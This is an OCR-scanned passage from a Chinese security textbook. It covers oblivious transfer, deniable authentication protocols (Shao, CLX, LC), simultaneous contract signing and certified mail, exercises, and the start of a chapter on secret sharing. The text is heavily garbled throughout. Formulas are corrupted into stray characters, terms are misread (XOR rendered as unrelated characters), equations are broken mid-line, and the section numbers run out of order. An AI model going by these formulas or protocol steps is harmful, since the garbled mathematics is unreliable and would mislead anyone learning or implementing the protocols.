一 cm 一 0, c= 一 …… 一 cs 一 1, 所 以 ,Bob 总 是 可 以 得 到 ,7 ,… ,ri 和 M,@r 四 m 四 …@ 
r-i ,那么 ,他 就 可 以 得 到 : M,=(M, 田 六 四 四 … 申 -~-)@(n 田 田 … 田 7,1)。 因 此 ， 
协议 满足 正确 性 要 求 。 
对 Bob 的 隐私 性 : 在 每 个 OT; 协议 中 ,Alice 无 法 得 到 c ,cs ，…，c-: ,从 而 无 法 知道 Bob 的 
选择 ;。 
对 Alice 的 隐私 性 : 首先 假设 Bob 可 以 得 到 M.。 那 么 ,他 就 要 得 到 : M, @r, 田 六 四 … 四 
~-1， 而 不 是 六 。 一 方面 ,由 于 他 想得到 M. ,那么 他 只 能 选择 ri ,r;,，…, 7,-1 ,从 而 无 法 得 到 
Mi ，M，…，M,-,。 从 另 一 方面 来 看 ,由 于 他 无 法 获知 x,, 而 要 想 知 道 M + ，M,+:，…， 
M, ,就 要 首先 得 到 M, + 四 关 @…@r,,M,+:@n @*…@r,n,"…,M, Or 四 … 四 一- 从 而 
无 法 得 到 M, +，M,+，…，M,。 因 此 ,协议 满足 对 Alice 的 隐私 性 。 


8.8 利用 2 取 1 不 经 意 传输 构造 n 取 1 不 经 意 传输 


协议 : 在 OT," 中 ,Alice 有 输入 M,，M,,…, M,E10,1)*。Bob 有 m 个 不 同 的 输入 c，,c;， 
mE{1,2,，…,n)。 构 造 OT," 如 下 : OT COM ，M:，…，M,)(cy，c，…，cn) 

Alice 和 Bob 执行 到 次 OT' 协议 : 

OT COM ，M:，…，M,)CcD)OT COM ，M:，…，M,)(c); 


OTICOM ，M: ，…，M,)(cn) 。 

证 明 ， 

正确 性 : 每 执行 一 次 OT; 协议 ,Bob 总 是 可 以 得 到 一 个 消息 ,那么 执行 m 次 以 后 ,Bob 可 以 得 
到 mm 个 消息 Mj ,jE€f{a, crs, cn)。 

对 Bob 的 隐私 性 : 每 执行 一 次 子 协议 OT; ,Alice 都 无 法 得 到 Bob 的 选择 ,因此 ,Alice 无 法 知 
Bob 的 m 个 选择 ci，, c，…, cn。 

对 Alice 的 隐私 性 : 每 执行 一 次 子 协议 OT; ,Bob 只 能 得 到 一 个 消息 ,因此 ,执行 m 次 子 协议 
OT; ,Bob 只 能 得 到 m 个 消息 。 


图 8.9 利用 nn 取 1 不 经 意 传输 构造 n 取 wm 不 经 意 传输 


Alice 的 输入 是 两 个 字符 串 w ,sm E {0,1)* ,Bob 的 输入 是 cE {0,1) 。 

协议 PKS-OTI(Cs ， 51)(c) 

(1) Alice 选择 一 个 随机 字符 串 CE {0,1)* ,将 C 发 送 给 Bob。 

(2) Bob 构造 出 一 对 公 钥 key 和 私 钥 Key- ,再 根据 等 式 key,., -.@ key。 一 C 计算 得 到 另外 一 
个 公 钥 key。_。, 密 钥 长 度 满 足 |IKeyw| 王 |Keyu |==|Key.|==1C|。 

(3) Bob 将 keyw 和 keys 发 送 给 Alice。 

(4) Alice 验证 是 否 keywm 四 keyu 一 C, 如 果 不 是 ,拒绝 执行 。 

(5) Alice 将 EC(s ，keyw ) 和 已 (s ，keyw ) 发 送 给 Bob。 

(6) Bob 利用 key 得 到 一 DOE(s ,key,) ,key。) 。 

证 明 : 

正确 性 : 如 果 Bob 和 Alice 都 是 诚实 的 ,那么 Bob 总 可 以 通过 如 下 方式 得 到 s. = D(E(s.， 

keywm) ,key,.) , 即 Bob 总 是 可 以 得 到 其 中 的 一 个 消息 。 

对 Bob 的 隐私 性 : 对 于 Alice 来 说 ,她 在 这 个 协议 中 所 得 到 的 只 是 2 个 随机 的 字符 串 keyw 和 

keym; 她 无 法 据 此 判断 c 的 确切 值 。 

对 Alice 的 隐私 性 : Bob 只 能 通过 如 下 方法 构造 公 钥 和 私 钥 Key , Key.. 下 key。a-。 ,根据 公 钥 密 

码 系统 的 要 求 ,Bob 无 法 通过 key,-. 计 算得 到 key,,-.。 从 而 ,Bob 只 能 得 到 s。 和, 中 的 一 个 。 

因此 ,通过 以 上 3 点 可 以 知道 ,协议 是 2 取 1 不经意 传输 协议 。 


图 8.10 基于 一 般 公 钥 密 码 系 统 的 2 取 1 不 经 意 传输 协议 


8.6 可 否认 认证 协议 : 换 种 角度 思考 


可 否认 认证 协议 是 指 消息 的 接收 方 能 够 辨别 出 发 送 方 的 身份 ,但 是 不 能 向 第 三 方 证 明 
发 送 方 身份 的 一 类 协议 。 可 否认 认证 协议 有 两 个 特征 : 首先 ,接收 方 可 辨别 消息 的 来 源 ; 
其 次 ,接收 方 不 能 向 第 三 方 证 明 消息 的 来 源 。 

实际 上 ,第 二 个 特征 又 包含 可 否认 性 的 两 个 不 同 层次 : 

(1) 接收 方 不 能 向 第 三 方 证 明 发 送 方 参与 过 通信 。 

(2) 接收 方 可 以 证 明 发 送 方 参与 过 通信 ,但 是 不 能 向 第 三 方 证 明 发 送 方 发 出 的 消息 内 容 。 

以 上 两 点 的 主要 区 别 在 于 接收 方 是 否 可 以 否认 参与 某 次 特定 的 通信 。 如 果 协 议 满足 
(1) ,那么 发 送 的 消息 内 容 自然 也 是 可 以 否认 的 ,所 以 (2) 是 (1) 的 一 种 特殊 情况 。 

在 实际 应 用 中 ,很 多 业务 只 需要 发 送 一 条 消息 就 能 完成 。 显 然 , 采 用 非 交互 式 的 可 否认 
认证 协议 更 适合 这 类 应 用 。 例 如 电子 投票 和 电子 邮件 协商 。 众 所 周知 ,一 次 完整 的 网 络 选 
举 要 求 投票 者 和 计 票 机 构 可 以 彼此 确认 对 方 的 身份 。 同 时 ,参与 者 为 了 保护 自己 ,需要 在 选举 
过 程 中 保持 选票 的 匿名 ,即使 是 计 票 机 构 也 不 能 在 事后 向 其 他 人 证 明 投 票 者 投 出 的 选票 信息 。 
根据 可 否认 认证 协议 的 不 同 的 应 用 环境 把 可 否认 认证 协议 分 为 交互 式 和 非 交 互 式 两 类 。 

可 否认 认证 协议 的 交互 式 可 以 分 为 两 种 情况 : 一 种 是 参与 方 为 了 传递 一 条 可 否认 认证 
消息 而 进行 信息 交换 ; 另 一 种 是 为 了 生成 会 话 密 钥 而 交互 。 交 互 式 可 和 否认 认证 协议 主要 用 
于 在 线 的 网 络 协商 或 者 网 络 会 议 等 工作 。 比 如 ,网 络 会 议 本 身 要 求 认 证 性 ,而 会 议 交流 协商 
过 程 中 的 信息 是 只 需要 对 方 认 证 的 消息 ,不 应 用 作 其 他 用 途 。 

(1) Shao 的 可 否认 认证 协议 ,如 图 8. 11 所 示 。 

(2) CLX 可 否认 认证 协议 。 

借鉴 Shao 的 非 交 互 式 可 否认 认证 协议 的 思想 ,Cao 等 人 以 双 线 性 对 为 工具 ,提出 了 基 
于 身份 的 CLX 可 否认 认证 协议 。 这 个 协议 包含 4 个 算法 : setup、extract、authenticate 和 
verify, 如 图 8. 12 所 示 。 


两 方 委 会 放 议 
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秦 于 案例 的 网 络 安全 技术 与 实践 


协议 采用 了 DSA 签名 方案 ,S 和 R 都 从 有 限 域 GF(g) 中 选择 元 素 Xs 和 X 作为 其 私 钥 , 并 
通过 计算 了 一 g” mod p 作为 其 公 钥 , 即 Ys 一 g*mod p ,Yr 一 g*mod p。 每 个 用 户 的 公 钥 均 
由 CA 验证。 于 是 ,S 和 有 各自 拥 有 公 钥 和 私 钥 。 另 外 ,Hash 函数 是 无 碰撞 的 公开 函数 。 当 
S 发 送 一 个 可 否认 的 消息 给 R 时 , 则 S 执行 下 述 协议 : 

(1) S 从 1 到 9 之 间 随 机 选择 整数 t。 

(2) S 计 算 K=Y&k mod p,r=H(K),MAC=H(K 1M),S=t—Xsr mod g。 

(3) 然后 S 发 送 (r,S,MAC) 和 消息 M 给 R。 

(4) R 计 算 K’=(gsYs)*mod p。 

(5) R 验 证 r=H(K’),MAC=H(K’ 1 MD 。 

如 果 收 到 的 消息 与 计算 得 到 的 相等 ,R 就 接受 ,否则 拒绝 。 

证 明 : 首先 ,如 果 发 送 者 和 接收 者 按 协议 规定 操作 ,那么 接收 者 总 能 够 认证 消息 源 。 

由 S 十 Xsr 二 +t mod g, 可 以 得 到 如 下 等 式 

g°Ys=g' mod p>(g°Ys)™ 一 gmod p=Yk mod p; 

K=K’=>r=H(K)=H(K)>H(K | M=H(K’ | MD 。 

因此 ,如 果 发 送 者 和 接收 者 按 协 议 规定 操作 ,那么 接收 者 总 能 够 认证 消息 源 。 

其 次 ,接收 者 能 够 用 伪造 的 消息 M' 构 造 其 他 的 认证 码 MAC’=H(K 1 MD), 且 (MAC ,M) 
与 真实 的 消息 认证 码 不 可 区 分 ,所 以 ,任何 人 都 不 相信 消息 (MAC,M) 的 真实 性 。 也 就 是 说 ， 
即便 接受 者 公开 密 钥 KK, 第 三 方 也 不 相信 消息 是 由 发 送 者 产生 的 。 


图 8.11 一 种 可 否认 认证 协议 


-Setup: Gl 和 G* 分 别 是 阶 为 n 的 加 法 群 和 乘法 群 。P 是 G, 的 生成 元 ,而 e:G, XG 一 G, 是 
满足 定义 2. 13( 第 2 章 ) 的 双 线 性 对 。 随 机 选取 *E Z; 作为 系统 主 密 钥 ,并 设 定 Pu 二 sP, 另 
外 ,选择 3 个 Hash 函数 : 如 :{0,1) 一 Gy ,H;:G? X{0,1) 一 {0,1}",H,:{0,1}" 一 {0， 
1)" ,以 及 一 个 对 称 加 密 算法 EE:{0,1)"X{0,1)" 一 {0,1}"。 消 息 空间 是 ME {0,1}"。 
-Extract: 对 于 给 定 的 字符 串 IDE {0,1)" ,PKG 计算 Qio 一 H,(ID) 作 为 ID 的 公 钥 ,而 其 对 
应 的 私 钥 是 So 一 sQm 。 
-Authenticate: 
(1) 发 送 者 Alice 知道 接收 者 Bob 的 身份 IDe, Bob 的 私 钥 是 Sm 。Alice 计算 Qo, 一 

H, (IDs) 。 
(2) Alice 计算 Y=e(TP, 必 十 Sm ,TP 十 Qio, ) ,其 中 TEZ; 是 时 间 蕉 。Alice 计算 会 话 密 钥 

K= H,(Y,ID,). 
(3) 当 Alice 认证 消息 ME {0,1)" 时 ,她 计算 MAC= H,(K,M) 和 密 文 CI=E(K,M)。 
(4) Alice 将 四 元 组 消息 (ID,T,MAC,CD) 发 送 给 接收 者 Bob。 
当 完 成 步骤 1 和 2 以 后 ,Alice 可 重复 步骤 3 和 4 多 次 ,直到 会 话 密 钥 K 过 期 。 
-Verify: 
(1) 收 到 消息 (IDA,T,MAC,CD 后 ,Bob 计算 会 话 密 钥 K" 二 H,(Y* ,1Ds), 其 中 Y* =e(TP 

+Qip, » TPyws + Siw, )。 
(2) 如 果 时 间 戳 合法 ,那么 Bob 解密 CI 得 到 消息 M" 并 计算 MAC* =H;(K* ,M" )。 
(3) Bob 验证 MAC 与 MAC ' 相等 是 否 成 立 ,如 果 成 立 , 则 接受 ,不 成 立 则 拒绝 。 如 果 Alice 只 

重复 执行 步骤 (3) 和 (4) 发 送 消息 ,那么 Bob 可 以 只 执行 步骤 (2) 和 (3) 验 证 。 
证 明 : 首先 ,参与 双方 都 按 协议 执行 , 则 消息 接收 者 总 能 够 验证 其 正确 性 。 因 为 在 协议 中 ,如 
果 消 息 (IDs,T,MAC,CD) 是 按 规则 生成 的 ,那么 肯定 可 以 按 如 下 方式 进行 计算 : 

Y* = e(TP + Qip, ,TP + Sip,) = e(TP + Qip, 1s(TP + Qip,)) 
= e(s(TP + Qn,),TP+ QD,) = e(TPys + Sw, ,TP+QD,)=Y 
K*= H:(Y° ,IDs) = H,.(Y,ID,)=K 
MAC* = H,(K*  ,M ) = H,(K,M) = MAC 

也 就 是 说 ,消息 通过 验证 。 
其 次 ,根据 伪造 的 消息 M' ,接收 者 也 能 够 通过 MAC’==H;(H;(Y,IDs),M) 和 CI =E(H; 
(Y,IDA) ,M') 产 生 消息 (ID ,T,MAC' ,CT) ,其 中 ,Y==e(TP 十 Qiw,，TPpws 十 Sio,)。 也 就 是 
说 ,在 协议 中 ,接收 者 能 够 模拟 产生 发 送 者 的 认证 消息 。 


图 8.12 CLX 可 否认 认证 协议 


(3) LC 可 否认 认证 协议 。 

LC 协议 是 基于 双 线 性 对 难题 设计 的 。 其 中 G! 和 Gs 分 别 是 阶 为 的 加 法 群 和 乘法 
群 。 己 是 G 的 生成 元 ,而 e:G1 XG 一 Gs 是 满足 定义 2. 49 的 双 线 性 对 。 两 个 Hash 函数 
Hi: GZ* ,Hi:G: X10,1)">Z; 是 公开 的 。 另 外 ,发 送 者 选择 随机 数 xz, EZ; 作 为 私 
钥 , 同 时 发 布 Y, 二 zx,P 作为 对 应 的 公 钥 ; 验证 则 也 选择 随机 数 xz, € Z; 作为 私 钥 , 同 时 发 
布 也 一 zrP 作为 对 应 的 公 钥 。 注 意 ,Y, 和 YY, 需要 被 TA 认证 ,具体 流程 如 图 8. 13 所 示 。 


1. 当 发 送 者 需要 给 接收 者 发 送 可 否认 的 认证 消息 m 时 ,发 送 者 先 执行 如 下 的 步骤 : 
(1) 选择 随机 数 1€ 2Z;，; 

(2) 计算 r= HCe,(P,P)'); 

(3) 计算 ss 

(4) 计算 MAC=H,(e(P,P)',m); 

(5) 发 送 (r,s,MAC,m) 给 接收 者 。 

2. 在 接收 者 收 到 (r,s,MAC,m) 后 ,通过 以 下 几 步 来 验证 : 

(1) 通过 如 下 方式 计算 eC(P,P)*: 


es 0P +Y)) = el( a 


:Pp ) = e(P,P)' 
Tr 


1 二 _ /tz 
rep (CoP+zP))= (zsP， 


(2) 检查 以 下 两 个 等 式 是 否 成 立 , 如 果 成 立 则 接受 (r,s, MAC,m): 

r= Hi(e(P,P)’'),MAC = H,(e(P,P)’ ,m) 
证 明 : 首先 ,如 果 协 议 的 参与 者 都 严格 遵守 协议 规则 ,那么 接收 者 将 总 能 认证 消息 源 。 
在 收 到 消息 后 ,消息 接收 者 Bob 可 以 通过 以 下 方式 计算 得 到 e(P,P): 


t 
rh 


由 于 e(P,P)' 的 计算 需要 发 送 者 的 公 钥 和 接收 者 的 私 钥 。 而 消息 验证 码 MAC= H, (e(P， 
P)' ,m) ,中 间 参 数 x 二 Hi(e(P,P)') ,所 以 通过 验证 等 式 x ==r 和 MAC=H;(e(P,P)',m) 是 
否 成 立 必然 能 够 确认 消息 的 来 源 。 


其 次 ,虽然 接收 者 可 以 通过 计算 一 二 ;一 


kz 
riz 


er 0ptY) = el( ,OP+zaP)]=e( P.-EP )= P,PpY 


党 了 将 * 转换 为 % ,这样 就 能 让 任何 人 都 可 以 


通过 (r,s ,MAC) 验 证 消息 m, 但 是 由 于 接收 者 能 够 根据 一 个 假 消息 m 构造 男 一 个 MAC 一 
H,(e(P,P)',m) ,而 MAC' 与 由 发 送 者 计算 的 实际 的 消息 验证 码 MAC 不 可 区 分 。 因 此 , 协 
议 是 可 否认 的 。 


图 8.13 LC 可 否认 认证 协议 


8.7 同步 秘密 交换 协议 : 同时 签约 的 升华 


同步 秘密 交换 协议 (simultaneous secret exchange) 最 初 的 思想 是 由 现实 场景 中 的 同时 
签约 发 展 而 来 。 同 时 签约 的 实例 如 下 。 

1. 带 有 仲裁 者 的 签约 

Alice 和 Bob 想 订立 一 个 合约 。 他 们 已 经 同意 了 其 中 的 措 词 ,但 每 个 人 都 想 等 对 方 签 
名 后 再 签名 。 如 果 是 面对面 的 ,这 很 容易 : 两 人 一 起 签 。 如 果 距 离 远 的 ,他 们 可 以 用 一 个 仲 
裁 者 。 
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(1) Alice 签署 合约 的 一 份 副本 并 发 送 给 Trent。 

(2) Bob 签署 合约 的 一 份 副 本 并 发 送 给 Trent。 

(3) Trent 发 送 一 份 消息 给 Alice 和 Bob ,指明 彼此 都 已 签约 。 

(4) Alice 签署 合约 的 两 份 副本 并 发 送 给 Bob 。 

(5) Bob 签署 合约 的 这 两 份 副本 ,自己 留 下 一 份 ,并 把 另 一 份 发 送 给 Alice。 

(6) Alice 和 Bob 都 通知 Trent 他 们 每 个 人 都 有 了 一 份 有 他 们 两 人 合 签 的 合约 副本 。 

(7) Trent 撕毁 在 每 一 份 上 只 有 一 个 签名 的 两 份 合约 副本 。 

这 个 协议 奏效 是 因为 Trent 防止 了 双方 中 的 某 一 方 进行 欺骗 。 如 果 在 步骤 (5) 中 Bob 
拒绝 签约 ,Alice 可 以 向 Trent 要 求 一 份 已 经 由 Bob 签署 的 合约 副本 。 如 果 在 步骤 (4) 中 
Alice 拒绝 签名 ,Bob 也 可 以 这 么 做 。 当 在 步骤 (3) 中 Trent 指明 他 收 到 了 两 份 合约 , Alice 
和 Bob 知道 彼此 已 受到 和 约 的 约束 。 如 果 Trent 在 步骤 (1) 和 (2) 中 没有 收 到 这 两 份 合约 ， 
他 便 撕 掉 已 收 到 的 那 份 , 则 两 方 都 不 受 合约 约束 。 

2. 无 仲裁 者 的 同时 签约 (面对面 ) 

如 果 Alice 和 Bob 正面 对 面 坐 着 ,那么 他 们 可 以 这 样 来 签约 : 

(1) Alice 签 上 她 名 字 的 第 一 个 字母 ,并 把 合约 递 给 Bob。 

(2) Bob 签 上 他 名 字 的 第 一 个 字母 ,并 把 合约 递 给 Alice。 

(3) Alice 签 上 她 名 字 的 第 二 个 字母 ,并 把 合约 递 给 Bob。 

(4) Bob 签 上 他 名 字 的 第 二 个 字母 ,并 把 合约 递 给 Alice。 

(5) 这 样 继续 下 去 ,直到 Alice 和 Bob 都 签 上 他 们 的 全 名 。 

如 果 你 忽视 掉 这 个 协议 的 一 个 明显 问题 (Alice 的 名 字 比 Bob 长 ) ,这 个 协议 照样 有 效 。 
在 只 签 了 一 个 字母 之 后 ,Alice 知道 法 官 不 会 让 她 受 合约 条 款 约束 。 但 签 这 个 字母 是 有 诚意 
的 举动 ,并 且 Bob 回 之 以 同样 有 诚意 的 举动 。 

在 每 一 方 都 签 了 几 个 字母 之 后 ,或 许可 以 让 法 官 相 信 双 方 已 签 了 合约 ,虽然 如 此 ,细节 
却 是 模糊 的 。 当 然 在 只 签 了 第 一 个 字母 后 他 们 确实 不 受 约束 ,正如 在 签 了 全 名 之 后 他 们 理 
所 当然 受 合约 约束 一 样 。 在 协议 中 哪 一 点 上 他 们 算是 正式 签约 呢 ? 在 签 了 他 们 名 字 的 一 半 
之 后 ? 三 分 之 二 之 后 ? 四 分 之 三 之 后 ? 

因为 Alice 或 Bob 都 不 能 她 或 他 受 约束 的 准确 点 ,他 们 每 一 位 至 少 有 些 担心 她 或 他 在 
整个 协议 上 都 受 合约 约束 。Bob 在 任 一 点 上 都 无 法 说 :“ 你 签 了 四 个 字母 而 我 只 签 了 三 个 ， 
你 受 约束 ,但 我 不 受 .”Bob 也 没有 理由 不 继续 这 个 协议 。 而 且 , 他 们 继续 得 越久 ,法 官 裁决 
他 们 受 合约 约 东 的 概率 越 大 。 另 外 ,也 不 存在 不 继续 执行 这 个 协议 的 理由 。 毕 况 他 们 都 想 
签约 ,他 们 只 是 不 想 先 于 另 一 方 签约 。 

3. 数字 证 明 邮 件 协议 

此 外 ,还 有 非 面对面 的 无 仲裁 者 的 同时 签约 。 这 些 真实 场景 均 可 以 转化 为 另外 一 个 场 
景 : 假设 Alice 要 把 一 条 消息 送 给 Bob ,但 如 果 没 有 签名 的 收 条 ,她 就 不 让 他 读 出 。 这 是 一 
个 典型 的 数字 证 明 邮 件 协议 ,在 实际 生活 中 是 邮政 工作 者 处 理 这 一 过 程 ,但 相同 的 事 可 以 使 
用 密码 术 来 做 。Whitfield Diffie 最 先 讨论 了 这 个 问题 : 

(1) Alice 用 一 个 随机 的 DES 密 钥 加 密 她 的 消息 ,并 把 它 发 送 给 Bob。 

(2) Alice 产生 n 对 DES 密 钥 。 每 对 密 钥 的 第 一 个 密 钥 是 随机 产生 的 ; 每 对 密 钥 的 第 
二 个 密 钥 是 第 一 个 密 钥 和 消息 加 密 密 钥 的 异 或 。 


(3) Alice 用 她 的 2n 个 密 钥 的 每 一 个 加 密 一 份 假 消息 。 

(4) Alice 把 所 有 加 密 消 息 都 发 送 给 Bob, 保 证 他 知道 哪些 消息 是 哪 一 对 的 哪 一 半 。 

(5) Bob 产生 nn 对 随机 DES 密 钥 。 

(6) Bob 产生 一 对 指明 一 个 有 效 收 条 的 消息 。 比 较 好 的 消息 可 以 是 “这 是 我 收 条 的 左 
半 ” 和 “这 是 我 收 条 的 右 半 ”, 再 附加 上 某 种 类 型 的 随机 比特 串 。 他 做 了 个 收 条 对 ,每 个 都 
编 上 号 。 如 同 先前 的 协议 一 样 ,如 果 Alice 能 产生 一 个 收 条 的 两 半 ( 编 号 相同 ) 和 她 的 所 有 
加 密 密 钥 ,这 个 收 条 被 认为 是 有 效 的 。 

(7) Bob 用 DES 密 钥 对 加 密 他 的 每 一 对 消息 ,第 i 份 消息 用 第 i 个 密 钥 , 左 半 消 息 用 密 
钥 对 中 的 左 密 钥 , 右 半 消息 用 密 钥 对 中 的 右 密 钥 。 

(8) Bob 把 他 的 消息 对 发 送 给 Alice, 保 证 Alice 知道 哪些 消息 是 哪 一 对 的 哪 一 半 。 

(9) Alice 和 Bob 利用 不 经 意 传输 协议 发 送 给 对 方 每 个 密 钥 对 。 那 就 是 说 ,对 对 中 的 
每 一 对 而 言 ,Alice 或 者 送 给 Bob 用 来 加 密 左 半 消 息 的 密 钥 ,或 者 送 给 Bob 用 来 加 密 右 半 消 
息 的 密 钥 。Bob 也 同样 这 么 做 。 他 们 可 以 或 者 交替 传送 这 些 一 半 , 或 者 一 方 发 送 nn 个 ,然后 
另 一 方 再 发 送 n 个 这 都 没有 关系 。 现 在 Alice 和 Bob 都 有 了 每 个 密 钥 对 中 的 一 个 密 钥 ,但 
是 都 不 知道 对 方 有 哪些 一 半 。 

(10) Alice 和 Bob 都 解密 他 们 能 解 的 那些 一 半 , 并 保证 解密 消息 是 有 效 的 。 

(11) Alice 和 Bob 送 给 对 方 所 有 2n 个 DES 密 钥 中 的 第 一 个 比特 (如 果 他 们 担心 Eve 
可 能 会 读 到 这 个 邮件 消息 ,那么 他 们 应 当 对 相互 的 传输 加 密 )。 

(12) Alice 和 Bob 对 所 有 2n 个 DES 密 钥 中 的 第 二 比特 ,第 三 比特 都 重复 第 (11) 步 ,如 
此 继续 下 去 ,直到 所 有 DES 密 钥 的 所 有 比特 都 传送 完 。 

(13) Alice 和 Bob 解密 消息 对 中 的 余下 一 半 。Alice 有 了 一 张 来 自 Bob 的 有 效 收 条 ,而 
Bob 能 异 或 任 一 密 钥 对 以 得 到 原始 消息 加 密 密 钥 。 

(14) Alice 和 Bob 交换 在 不 经 意 传输 协议 期 间 使 用 的 私 钥 ,同时 每 一 方 验证 男 一 方 没 
有 进行 欺骗 。 

Bob 的 第 (5) 一 (8) 步 和 Alice 和 Bob 的 第 (9) 一 (12) 步 都 和 签约 协议 相同 。 意 想不到 
的 手法 是 Alice 的 所 有 假 消息 。 它 们 给 予 Bob 一 些 办 法 来 检查 第 (10) 步 中 Alice 的 不 经 意 
传输 的 有 效 性 ,这 可 以 迫使 Alice 在 第 (11) 一 (13) 步 期 间 保持 诚实 。 并 且 如 同 同 时 签约 协 
议 一 样 ,完成 协议 要 求 Alice 的 一 个 消息 对 的 左右 两 半 。 

4. 同步 秘密 交换 协议 

场景 实例 : Alice 知道 秘密 A; Bob 知道 秘密 B。 如 果 Bob 告诉 Alice B,Alice 愿意 告 
诉 Bob A。 如 果 Alice 告诉 他 A,Bob 愿意 告诉 Alice B: 

(1) Alice:“ 如 果 你 先 告诉 我 ,我 就 告诉 你 .”(2)Bob:“ 如 果 你 先 告诉 我 ,我 就 告诉 你 。” 
(3)Alice:“ 不 ,你 先 讲 .”(4)Bob:“ 噢 ,好 吧 ”(Bob 悄悄 说 了 )。(5) Alice:“ 哈 ! 我 不 告诉 
你 .”(6)Bob:“ 那 不 公平 。” 

可 以 对 数字 证 明 邮 件 协 议 进 行 修改 以 达到 一 种 同步 秘密 交换 协议 : Alice 使 用 A 作 消 
息 完 成 第 (1) 一 (4) 步 。Bob 用 B 作 消息 完成 类 似 的 步骤 。Alice 和 Bob 在 第 (9) 步 中 执行 
不 经 意 传 输 ,在 第 (10) 步 中 解密 他 们 能 解密 的 那 一 半 消 息 ,并 在 第 (11) 和 第 (12) 步 中 处 理 完 
那些 迭代 。 如 果 他 们 要 防范 Eve, 他 们 应 当 加 密 其 消息 。 最 后 ,Alice 和 Bob 对 余下 的 一 半 
解密 消息 ,并 异 或 任 一 密 钥 对 来 得 到 原始 消息 加 密 密 钥 。 
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8.8 小 结 


本 章 针 对 不 同 应 用 领域 ,给 出 零 知 识 协议 、. 比 特 承诺 、 掷 币 协议 .电话 扑克 协议 \ 不 经 意 
传输 ,不 可 和 否认 以 及 同步 秘密 交换 等 典型 两 方 协议 ,并 辅 以 简洁 方案 或 应 用 实例 ,使 学 生 形 
成 由 物理 世界 的 应 用 转化 为 信息 世界 的 数字 的 思维 方式 ,最 终 达 到 理论 与 应 用 相 结合 的 
目的 。 


8.9 习 题 


1. 简 述 零 知 识 协 议 与 认证 中 的 挑战 -应 答 协议 的 区 别 。 

2. 波 利 发 布 一 个 1024 位 的 RSA 公 钥 (n, e) ,并 想 让 维尼 验证 自己 拥有 相对 应 的 私 钥 
d。 因 此 ,他 们 的 朋友 泽 克 提 出 一 种 证 明 系 统 : 

(1) 维尼 选择 一 个 随机 数 ~ (mod n) ,将 加 密 信息 x*(mod nn) 发 送 给 波 利 。 

(2) 波 利 解密 收 到 的 消息 ,然后 将 解密 值 发 送 给 维尼 。 

(3) 维尼 收 到 的 消息 如 果 等 于 x, 则 接受 ,否则 拒绝 。 

问题 : 泽 克 的 协议 是 完备 且 合理 的 ,你 认为 维尼 需要 多 次 重复 协议 以 至 于 确信 波 利 知 
道 d 么 ? 解释 为 什么 。 

3. 说 明 你 研究 两 方 安 全 协议 后 的 想法 。 


第 9 章 多 方 安全 协议 


21 世纪 世界 上 只 有 两 种 生意 ,就 是 拥有 网 站 的 企业 和 将 被 收盘 的 生意 ,未 来 要 么 
电子 商务 ,要 么 无 商 可 务 。 


9.1 基本 多 方 安全 协议 


9.1.1 秘密 共享 : 权力 集中 还 是 分 散 


设想 你 已 发 明了 一 种 新 的 ,味道 鲜美 的 桨 牛肉 ,或 者 你 已 经 制作 了 一 种 碎 肉 夹 饼 的 调味 
料 ,哪怕 它 比 你 的 竞争 者 的 更 逊色 。 重 要 的 是 : 你 都 必须 保守 秘密 。 你 只 能 告诉 最 信赖 的 
雇员 各 种 成 分 准确 的 调和 ,但 如 果 他 们 中 的 一 个 背叛 到 对 手 方 时 秘密 就 会 泄漏 ,不 久 , 每 个 
竞争 对 手 将 做 出 和 你 的 一 样 的 调味 料 。 这 种 问题 的 产生 如 图 9. 1 所 示 。 


图 传统 秘密 保持 的 缺陷 : 集中 式 的 秘密 保持 导致 风险 集中 、 权 力 集中 。 
图 秘密 分 割 : 把 一 个 消息 分 成 n 块 ,单独 的 每 一 块 看 起 来 没有 意义 ,但 所 有 的 块 集合 起 来 能 
恢复 出 消息 。 


图 9.1 秘密 分 割 问题 的 产生 


案例 1: 商店 的 保险 箱 可 能 要 求 同 时 用 经 理 的 钥匙 和 和 运 钞 车 司机 的 钥匙 才能 打开 : 避 
免 不 诚实 的 经 理 或 运 钞 车 司机 偷窃 钱财 ; 防止 歹徒 威胁 手无寸铁 的 经 理 。 

案例 2: 在 可 信 第 三 方 Trent 的 主导 下 将 某 秘 密 进行 分 割 在 Alice 与 Bob 之 间 共 享 的 
简单 协议 。 

秘密 分 割 : Trent 产生 一 个 随机 比特 R(R 和 M 一 样 长 度 ) ,Trent 用 R 蜡 或 M 得 到 
S 一 RM,Trent 将 尺 给 Alice, 将 S 给 Bob。 

秘密 重 构 : Alice 与 Bob 将 他 们 的 消息 异 或 就 可 以 得 到 消息 M=RGS。 


基于 案例 的 网 络 安 会 其 术 与 实践 


案例 2 可 以 扩展 到 N 方 , 即 在 可 信 第 三 方 Trent 的 主导 下 将 某 秘 密 进行 分 割 在 N 个 人 
之 间 共 享 的 简单 协议 ,如 扩展 到 三 方 : Trent 分 给 每 个 人 : Ri 、R; RiGOR: 中 M, 其 中 M 是 秘 
密 消息 ; 扩展 到 五 方 : 假设 秘密 密 钥 为 ;,A 与 5 个 人 进行 共享 ,把 它 分 为 :一 9 四 中 四 * 
四 ss ,并 且 给 定 s; 到 第 i 个人。 没有 一 个 人 可 以 计算 出 s,4 个 人 也 不 能 计算 出 *, 必 须 五 人 
才能 计算 。 如 果 聚 齐 密 钥 ,可 以 恢复 s。 但 这 种 秘密 分 割 的 简单 协议 有 如 下 主要 缺点 : 如 有 
一 方 不 参与 , 则 无 法 恢复 。 即 容错 性 差 , 单 点 失效 。 为 了 使 秘密 泄露 的 风险 降低 ,进一步 改 
进 密码 分 割 中 所 存在 的 问题 ,Blakley 和 Shamir 在 1979 年 分 别 独立 提出 秘密 共享 体制 。 秘 
密 共 享 体制 的 模型 如 图 9. 2 所 示 。 


基于 主 密 钥 的 信息 安全 系统 的 缺陷 

图 主 密 钥 偶然 或 有 意 地 被 泄露 ,系统 中 的 秘密 信息 会 遭受 攻击 。 

图 主 密 钥 丢失 或 损坏 ,系统 中 的 秘密 信息 将 无 法 恢复 。 

图 主 密 钥 的 解决 方案 导致 权力 过 于 集中 一 一 密 钥 管理 。 

秘密 共享 目标 

图 是 秘密 分 割 密码 技术 的 一 种 推广 。 

图 目的 是 阻止 秘密 过 于 集中 ,以 达到 分 散 风险 和 容忍 人 侵 的 目的 。 

最 常用 的 秘密 共享 方案 一 一 门限 方案 

图 门限 方案 : 实现 门限 访问 结构 的 秘密 共享 需要 一 个 (m,n) 的 门限 访问 结构 ,包括 : m 为 
门限 值 ; 秘密 SK 被 拆 分 为 ”个 份额 的 共享 秘密 ， 利用 任意 m 个 或 更 多 个 共享 份额 可 以 
